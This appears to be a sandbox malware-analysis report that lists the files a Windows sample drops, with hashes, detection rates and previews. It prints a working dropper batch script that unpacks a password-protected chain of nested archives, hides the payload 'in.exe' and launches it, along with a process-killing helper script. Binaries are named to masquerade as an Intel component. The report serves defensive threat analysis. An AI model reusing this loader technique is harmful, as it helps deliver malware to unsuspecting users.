Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3032576
Entropy (8bit):	6.531591038682421
Encrypted:	false
SSDEEP:
MD5:	C9624E4E0C6BBC83B57F844D1DC44102
SHA1:	B0F8C247986305F8F1F83EA55BB04F6C748557CE
SHA-256:	A7A661CF43D7129A809901C641998089AFF10F97A09BBDF5874BA16C01DB5DFB
SHA-512:	0417B2186A7F284A79016BD2CC473768293F2C262400439DAC659B0A46CFF82F72018F6FBBB3BA41B6D76EEFF1F96110F8CD5C4739989DAFB17942DD0E9A0D23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 53%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@.......................... 2...........@.................................W...k.............................1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...hjveylar.0+......,+.................@...feaxxngf......1...... ..............@....taggant.0....1.."...$..............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\main\7z.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1679360
Entropy (8bit):	6.278252955513617
Encrypted:	false
SSDEEP:
MD5:	72491C7B87A7C2DD350B727444F13BB4
SHA1:	1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
SHA-256:	34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
SHA-512:	583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......\|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\main\7z.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	468992
Entropy (8bit):	6.157743912672224
Encrypted:	false
SSDEEP:
MD5:	619F7135621B50FD1900FF24AADE1524
SHA1:	6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
SHA-256:	344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
SHA-512:	2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\main\KillDuplicate.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	222
Entropy (8bit):	4.855194602218789
Encrypted:	false
SSDEEP:
MD5:	68CECDF24AA2FD011ECE466F00EF8450
SHA1:	2F859046187E0D5286D0566FAC590B1836F6E1B7
SHA-256:	64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
SHA-512:	471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
Malicious:	false
Reputation:	unknown
Preview:	Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f

C:\Users\user\AppData\Local\Temp\main\extracted\AntiAV.data

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	2355713
Entropy (8bit):	5.891648193754473
Encrypted:	false
SSDEEP:
MD5:	579A63BEBCCBACAB8F14132F9FC31B89
SHA1:	FCA8A51077D352741A9C1FF8A493064EF5052F27
SHA-256:	0AC3504D5FA0460CAE3C0FD9C4B628E1A65547A60563E6D1F006D17D5A6354B0
SHA-512:	4A58CA0F392187A483B9EF652B6E8B2E60D01DAA5D331549DF9F359D2C0A181E975CF9DF79552E3474B9D77F8E37A1CF23725F32D4CDBE4885E257A7625F7B1F
Malicious:	false
Reputation:	unknown
Preview:	KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4

C:\Users\user\AppData\Local\Temp\main\extracted\file_1.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	1799594
Entropy (8bit):	7.99773141173711
Encrypted:	true
SSDEEP:
MD5:	5659EBA6A774F9D5322F249AD989114A
SHA1:	4BFB12AA98A1DC2206BAA0AC611877B815810E4C
SHA-256:	E04346FEE15C3F98387A3641E0BBA2E555A5A9B0200E4B9256B1B77094069AE4
SHA-512:	F93ABF2787B1E06CE999A0CBC67DC787B791A58F9CE20AF5587B2060D663F26BE9F648D116D9CA279AF39299EA5D38E3C86271297E47C1438102CA28FCE8EDC4
Malicious:	false
Reputation:	unknown
Preview:	PK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./..t?......6FU....;2].@...z..8..K^B/W..

C:\Users\user\AppData\Local\Temp\main\extracted\file_2.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1799748
Entropy (8bit):	7.997729415613798
Encrypted:	true
SSDEEP:
MD5:	5404286EC7853897B3BA00ADF824D6C1
SHA1:	39E543E08B34311B82F6E909E1E67E2F4AFEC551
SHA-256:	EC94A6666A3103BA6BE60B92E843075A2D7FE7D30FA41099C3F3B1E2A5EBA266
SHA-512:	C4B78298C42148D393FEEA6C3941C48DEF7C92EF0E6BAAC99144B083937D0A80D3C15BD9A0BF40DAA60919968B120D62999FA61AF320E507F7E99FBFE9B9EF30
Malicious:	false
Reputation:	unknown
Preview:	PK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./

C:\Users\user\AppData\Local\Temp\main\extracted\file_3.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1799902
Entropy (8bit):	7.997726708945573
Encrypted:	true
SSDEEP:
MD5:	5EB39BA3698C99891A6B6EB036CFB653
SHA1:	D2F1CDD59669F006A2F1AA9214AEED48BC88C06E
SHA-256:	E77F5E03AE140DDA27D73E1FFE43F7911E006A108CF51CBD0E05D73AA92DA7C2
SHA-512:	6C4CA20E88D49256ED9CABEC0D1F2B00DFCF3D1603B5C95D158D4438C9F1E58495F8DFA200DBE7F49B5B0DD57886517EB3B98C4190484548720DAD4B3DB6069E
Malicious:	false
Reputation:	unknown
Preview:	PK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu..

C:\Users\user\AppData\Local\Temp\main\extracted\file_4.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1800056
Entropy (8bit):	7.997723543142523
Encrypted:	true
SSDEEP:
MD5:	7187CC2643AFFAB4CA29D92251C96DEE
SHA1:	AB0A4DE90A14551834E12BB2C8C6B9EE517ACAF4
SHA-256:	C7E92A1AF295307FB92AD534E05FBA879A7CF6716F93AEFCA0EBFCB8CEE7A830
SHA-512:	27985D317A5C844871FFB2527D04AA50EF7442B2F00D69D5AB6BBB85CD7BE1D7057FFD3151D0896F05603677C2F7361ED021EAC921E012D74DA049EF6949E3A3
Malicious:	false
Reputation:	unknown
Preview:	PK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}.

C:\Users\user\AppData\Local\Temp\main\extracted\file_5.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1800210
Entropy (8bit):	7.997720745184939
Encrypted:	true
SSDEEP:
MD5:	B7D1E04629BEC112923446FDA5391731
SHA1:	814055286F963DDAA5BF3019821CB8A565B56CB8
SHA-256:	4DA77D4EE30AD0CD56CD620F4E9DC4016244ACE015C5B4B43F8F37DD8E3A8789
SHA-512:	79FC3606B0FE6A1E31A2ECACC96623CAF236BF2BE692DADAB6EA8FFA4AF4231D782094A63B76631068364AC9B6A872B02F1E080636EBA40ED019C2949A8E28DB
Malicious:	false
Reputation:	unknown
Preview:	PK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z..

C:\Users\user\AppData\Local\Temp\main\extracted\file_6.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1800364
Entropy (8bit):	7.997716835838842
Encrypted:	true
SSDEEP:
MD5:	0DC4014FACF82AA027904C1BE1D403C1
SHA1:	5E6D6C020BFC2E6F24F3D237946B0103FE9B1831
SHA-256:	A29DDD29958C64E0AF1A848409E97401307277BB6F11777B1CFB0404A6226DE7
SHA-512:	CBEEAD189918657CC81E844ED9673EE8F743AED29AD9948E90AFDFBECACC9C764FBDBFB92E8C8CEB5AE47CEE52E833E386A304DB0572C7130D1A54FD9C2CC028
Malicious:	false
Reputation:	unknown
Preview:	PK........n..Y..+..x...x......file_5.zipPK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..

C:\Users\user\AppData\Local\Temp\main\extracted\file_7.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	3473559
Entropy (8bit):	7.9992359395959935
Encrypted:	true
SSDEEP:
MD5:	CEA368FC334A9AEC1ECFF4B15612E5B0
SHA1:	493D23F72731BB570D904014FFDACBBA2334CE26
SHA-256:	07E38CAD68B0CDBEA62F55F9BC6EE80545C2E1A39983BAA222E8AF788F028541
SHA-512:	BED35A1CC56F32E0109EA5A02578489682A990B5CEFA58D7CF778815254AF9849E731031E824ADBA07C86C8425DF58A1967AC84CE004C62E316A2E51A75C8748
Malicious:	false
Reputation:	unknown
Preview:	PK........n..Y`.T......#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..\|...$..}.`..8......lV1..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T......A..\|...{A.p{.b*.\|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.\|.g....&.d..Y.\|..5O...s.\|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....

C:\Users\user\AppData\Local\Temp\main\extracted\in.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1827328
Entropy (8bit):	7.963282633529333
Encrypted:	false
SSDEEP:
MD5:	83D75087C9BF6E4F07C36E550731CCDE
SHA1:	D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
SHA-256:	46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
SHA-512:	044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 70%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..\|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:\|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...

C:\Users\user\AppData\Local\Temp\main\file.bin

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	3473725
Entropy (8bit):	7.999948676888215
Encrypted:	true
SSDEEP:
MD5:	045B0A3D5BE6F10DDF19AE6D92DFDD70
SHA1:	0387715B6681D7097D372CD0005B664F76C933C7
SHA-256:	94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
SHA-512:	58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
Malicious:	false
Reputation:	unknown
Preview:	PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW\|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.

C:\Users\user\AppData\Local\Temp\main\file.zip (copy)

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	3473725
Entropy (8bit):	7.999948676888215
Encrypted:	true
SSDEEP:
MD5:	045B0A3D5BE6F10DDF19AE6D92DFDD70
SHA1:	0387715B6681D7097D372CD0005B664F76C933C7
SHA-256:	94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
SHA-512:	58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
Malicious:	false
Reputation:	unknown
Preview:	PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW\|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.

C:\Users\user\AppData\Local\Temp\main\main.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	440
Entropy (8bit):	5.0791308599041844
Encrypted:	false
SSDEEP:
MD5:	3626532127E3066DF98E34C3D56A1869
SHA1:	5FA7102F02615AFDE4EFD4ED091744E842C63F78
SHA-256:	2A0E18EF585DB0802269B8C1DDCCB95CE4C0BAC747E207EE6131DEE989788BCA
SHA-512:	DCCE66D6E24D5A4A352874144871CD73C327E04C1B50764399457D8D70A9515F5BC0A650232763BF34D4830BAB70EE4539646E7625CFE5336A870E311043B2BD
Malicious:	false
Reputation:	unknown
Preview:	..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p24291711423417250691697322505 -oextracted ..for /l %%i in (7,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..

C:\Users\user\AppData\Local\Temp\service123.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	314617856
Entropy (8bit):	0.0023406044119182
Encrypted:	false
SSDEEP:
MD5:	3F2F75FBF18F3A962480828367DA1474
SHA1:	E873106750C96AF2E4B514B454B26144FDCBD51B
SHA-256:	91143D5A391BB62354AE821F07E7B0137A17D8111D48562B4056F0FC4B8A925F
SHA-512:	92B85A5301C480D85C296C629F2B3D0574D1CA2C87F4CABF84216E8687B70EC3E9E29B14FEAD335FFD3C809B7ED4FFB5833C34C0F5E528FDA913B0D44C2A2F68
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n.cg...............(.v........................@.......................... ............@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............\|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\in.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1827328
Entropy (8bit):	7.963282633529333
Encrypted:	false
SSDEEP:
